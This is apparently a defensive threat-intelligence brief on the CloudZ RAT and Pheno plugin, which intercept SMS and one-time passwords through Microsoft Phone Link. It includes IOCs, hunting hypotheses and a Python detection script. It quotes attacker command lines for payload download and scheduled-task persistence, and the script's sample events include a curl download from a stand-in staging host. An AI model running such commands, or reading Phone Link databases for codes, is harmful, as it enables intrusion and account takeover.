
Cisco Talos identified an intrusion campaign utilizing the CloudZ RAT and a novel plugin named Pheno to intercept SMS and OTP messages. The malware abuses the Microsoft Phone Link application's PC-to-phone bridge, allowing attackers to steal sensitive authentication data from local SQLite databases without deploying malware directly to the victim's mobile device.

Sensitivity: 24h · Confidence: high · Analyzed: 2026-05-05

Authors: Alex Karkins, Chetan Raghuprasad

Actors: CloudZ RAT, Pheno plugin

Source:Cisco Talos


What Happened

Security researchers have discovered a new cyberattack campaign that uses a malicious program called CloudZ. This program installs a special tool named Pheno to spy on the Microsoft Phone Link app, which connects a user's Windows computer to their smartphone. By monitoring this connection, the attackers can secretly read text messages and one-time passwords (OTPs) sent to the phone. This allows the attackers to bypass security measures like two-factor authentication on other accounts. Users should be cautious of fake software updates and organizations should monitor their systems for the specific warning signs associated with this malware.

Key Takeaways

  • CloudZ RAT utilizes a novel plugin named Pheno to intercept SMS and OTP messages by abusing the Microsoft Phone Link application.
  • The attack chain begins with a fake ScreenConnect update that drops a Rust-compiled loader.
  • Persistence is established via a scheduled task that executes a .NET loader using the LOLBin regasm.exe.
  • CloudZ operates dynamically in memory and employs extensive evasion techniques against debuggers, sandboxes, and security tools.
  • The malware uses a three-method fallback approach (curl, PowerShell, bitsadmin) to download secondary payloads and plugins.

Affected Systems

  • Windows 10
  • Windows 11
  • Microsoft Phone Link application

Attack Chain

The attack begins with a fake ScreenConnect update that executes a Rust-compiled dropper. This dropper places a .NET loader on the system and establishes persistence via a scheduled task that abuses regasm.exe. The loader decrypts and executes the CloudZ RAT in memory, which then connects to a C2 server and downloads the Pheno plugin. Pheno monitors the Microsoft Phone Link application to intercept SMS and OTPs from the local SQLite database.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: Yes
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No
  • Platforms: Snort, ClamAV

The article provides Snort rule IDs and ClamAV signature names for detecting the CloudZ RAT and its network activity.

Detection Engineering Assessment

  • EDR Visibility: High — EDR solutions can detect the creation of suspicious scheduled tasks, the use of LOLBins like regasm.exe to load text files, and unusual process access to the Phone Link SQLite databases.
  • Network Visibility: Medium — While C2 traffic is encrypted, the use of specific Pastebin URLs, Cloudflare Workers domains, and hardcoded User-Agent strings can be monitored.
  • Detection Difficulty: Moderate — The malware uses in-memory execution and LOLBins to evade basic detection, but its reliance on scheduled tasks and specific file paths for staging provides reliable detection opportunities.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • File Creation (Event ID 11)
  • Scheduled Task Activity (Event ID 4698)

Hunting Hypotheses

  • Hypothesis: Look for regasm.exe executing with command line arguments pointing to non-standard extensions like .txt, especially in C:\ProgramData. | Telemetry: Process Creation | ATT&CK Stage: Execution | FP Risk: Low
  • Hypothesis: Monitor for unexpected processes accessing or copying the PhoneExperiences-*.db SQLite database associated with the Phone Link application. | Telemetry: File Access | ATT&CK Stage: Collection | FP Risk: Medium
  • Hypothesis: Search for scheduled task creation events where the task name is SystemWindowsApis and the action involves PowerShell or regasm.exe. | Telemetry: Scheduled Task Creation | ATT&CK Stage: Persistence | FP Risk: Low
  • Hypothesis: Identify curl.exe or bitsadmin.exe downloading executable files into C:\Windows\TEMP\ or C:\ProgramData. | Telemetry: Process Creation | ATT&CK Stage: Command and Control | FP Risk: Medium
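As an added illustration (not code from the Talos report), the four hunting hypotheses above and the phonelink-<COMPUTERNAME>.txt staging indicator expressed as rules over constructed Sysmon-style events. The sample events, the Phone Link package path and the PhoneExperienceHost.exe allow-list are assumptions to tune for your own telemetry.

```python
import re
from fnmatch import fnmatch

# Constructed Sysmon-style events (not from the report): "process" ~ Event ID 1/4688, "task" ~ 4698, "file" ~ 11.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe",
     "cmdline": r"regasm.exe C:\ProgramData\Microsoft\WindowsDoc\update.txt"},
    {"type": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl -L -o C:\ProgramData\Microsoft\WindowsDoc\update.txt https://staging.invalid/a"},
    {"type": "process", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe",
     "cmdline": r"regasm.exe C:\Program Files\Vendor\Component.dll /codebase"},  # benign registration
    {"type": "task", "task_name": r"\Microsoft\Windows\SystemWindowsApis",
     "action": r"powershell.exe -File C:\ProgramData\Microsoft\run.ps1"},
    {"type": "file", "image": r"C:\Windows\System32\notepad.exe",
     "target": r"C:\Users\u\AppData\Local\Packages\PhoneLink\PhoneExperiences-1.db"},  # assumed path
    {"type": "file", "image": r"C:\Users\u\AppData\Local\Temp\x.exe",
     "target": r"C:\ProgramData\Microsoft\feedback\cm\phonelink-WS01.txt"},
]

STAGING_DIRS = (r"c:\programdata", r"c:\windows\temp")
# Assumed allow-list of processes expected to open the Phone Link database; tune per fleet.
ALLOWED_DB_READERS = {"phoneexperiencehost.exe"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the name of the matched hunting hypothesis, or None if the event looks benign."""
    if ev["type"] == "process":
        exe, cmd = basename(ev["image"]), ev["cmdline"].lower()
        if exe == "regasm.exe" and re.search(r"\.txt(\s|$)", cmd):       # regasm loading a .txt
            return "regasm_loads_txt"
        if exe in ("curl.exe", "bitsadmin.exe") and any(d in cmd for d in STAGING_DIRS):
            return "lolbin_download_to_staging"
    elif ev["type"] == "task":
        if basename(ev["task_name"]) == "systemwindowsapis" and re.search(r"powershell|regasm", ev["action"], re.I):
            return "systemwindowsapis_task"
    elif ev["type"] == "file":
        if fnmatch(basename(ev["target"]), "phoneexperiences-*.db") and basename(ev["image"]) not in ALLOWED_DB_READERS:
            return "phone_link_db_access"
        if re.search(r"\\microsoft\\feedback\\cm\\phonelink-[^\\]+\.txt$", ev["target"], re.I):
            return "pheno_staging_file"
    return None

def hunt(events):
    """Pair each matching event with its hypothesis name; benign events are dropped."""
    return [(name, e) for e in events if (name := classify(e))]
```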

Control Gaps

  • Lack of MFA on initial access vectors
  • Insufficient monitoring of LOLBin execution (regasm.exe)

Key Behavioral Indicators

  • regasm.exe loading .txt files
  • Creation of phonelink-<COMPUTERNAME>.txt in %TEMP% or C:\ProgramData
  • Scheduled task named SystemWindowsApis

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Block the identified C2 IP (185.196.10.136) and associated Cloudflare Worker domains.
  • Search endpoints for the presence of 'update.txt' or 'pheno.exe' in the specified staging directories.

Infrastructure Hardening

  • Restrict the execution of LOLBins like regasm.exe and bitsadmin.exe where not required for business operations.
  • Implement network filtering to block access to unapproved file-sharing sites like Pastebin.

User Protection

  • Educate users on the risks of fake software updates, particularly for remote access tools like ScreenConnect.
  • Monitor or restrict the use of the Microsoft Phone Link application on corporate devices if not required.

Security Awareness

  • Train employees to recognize social engineering tactics used to deliver fake software updates.
  • Highlight the risk of SMS-based OTP interception and encourage the use of hardware security keys or app-based authenticators where possible.

MITRE ATT&CK Mapping

  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1053.005 - Scheduled Task/Job: Scheduled Task
  • T1218.009 - System Binary Proxy Execution: Regsvcs/Regasm
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.001 - Impair Defenses: Disable or Modify Tools
  • T1005 - Data from Local System
  • T1552.001 - Credentials In Files
  • T1105 - Ingress Tool Transfer
  • T1057 - Process Discovery

Additional IOCs

  • IPs:
    • 185[.]196[.]10[.]136 - CloudZ C2 server IP address
  • Domains:
    • calm-wildflower-1349[.]hellohiall[.]workers[.]dev - Staging server domain for downloading the .NET loader
    • round-cherry-4418[.]hellohiall[.]workers[.]dev - Staging server domain for secondary configuration
    • orange-cell-1353[.]hellohiall[.]workers[.]dev - Staging server domain for the Pheno plugin
    • calm-mountain-8d18[.]hellohiall[.]workers[.]dev - Staging server domain identified in malware configuration extraction
    • pastebin[.]com - Legitimate service abused to host secondary configuration data
  • URLs:
    • hxxps://calm-wildflower-1349[.]hellohiall[.]workers[.]dev - URL used to download the .NET loader
    • hxxps://round-cherry-4418[.]hellohiall[.]workers[.]dev/?t=1773406370 - URL hosting secondary configuration data
    • hxxps://pastebin[.]com/raw/8pYAgF0Z?t=1771833517 - Pastebin URL hosting secondary configuration data
    • hxxps://orange-cell-1353[.]hellohiall[.]workers[.]dev/pheno.exe - Download URL for the Pheno plugin
    • hxxps://calm-mountain-8d18[.]hellohiall[.]workers[.]dev/?t=1771832539 - Secondary configuration URL identified in memory extraction
  • File Paths:
    • C:\ProgramData\Microsoft\windosDoc\msupdate.txt - Alternative filename for the dropped .NET loader
    • C:\programdata\Microsoft\feedback\cm\phonelink-<COMPUTERNAME>.txt - Staging file used by Pheno plugin to log Phone Link reconnaissance data
    • %TEMP%\Microsoft\feedback\cm\phonelink-<COMPUTERNAME>.txt - Alternative staging file used by Pheno plugin to log Phone Link reconnaissance data
    • C:\ProgramData\Microsoft\whealth\ - Staging directory used by CloudZ to save plugins to disk
    • C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\regasm.exe - LOLBin used to execute the .NET loader
  • Command Lines:
    • Purpose: Downloads the .NET loader from a staging server | Tools: curl.exe | Stage: Execution/Payload Delivery | curl -L -o C:\ProgramData\Microsoft\WindowsDoc\update.txt
    • Purpose: Creates a scheduled task for persistence | Tools: schtasks.exe | Stage: Persistence | schtasks /create /tn \Microsoft\Windows\SystemWindowsApis /tr
    • Purpose: Executes the .NET loader via LOLBin | Tools: powershell.exe, regasm.exe | Stage: Execution
    • Purpose: Checks for running instances of the loader | Tools: powershell.exe | Stage: Discovery/Execution | Get-CimInstance Win32_Process | Where-Object
    • Purpose: Fallback method to download payloads | Tools: bitsadmin.exe | Stage: Execution/Payload Delivery
  • Other:
    • rustextractor.pdb - PDB string found in the Rust-compiled loader
    • SystemWindowsApis - Name of the scheduled task created for persistence
    • HELLOHIALL - Pastebin handler name used by the attacker
    • PhoneExperiences-*.db - SQLite database file targeted for SMS and OTP theft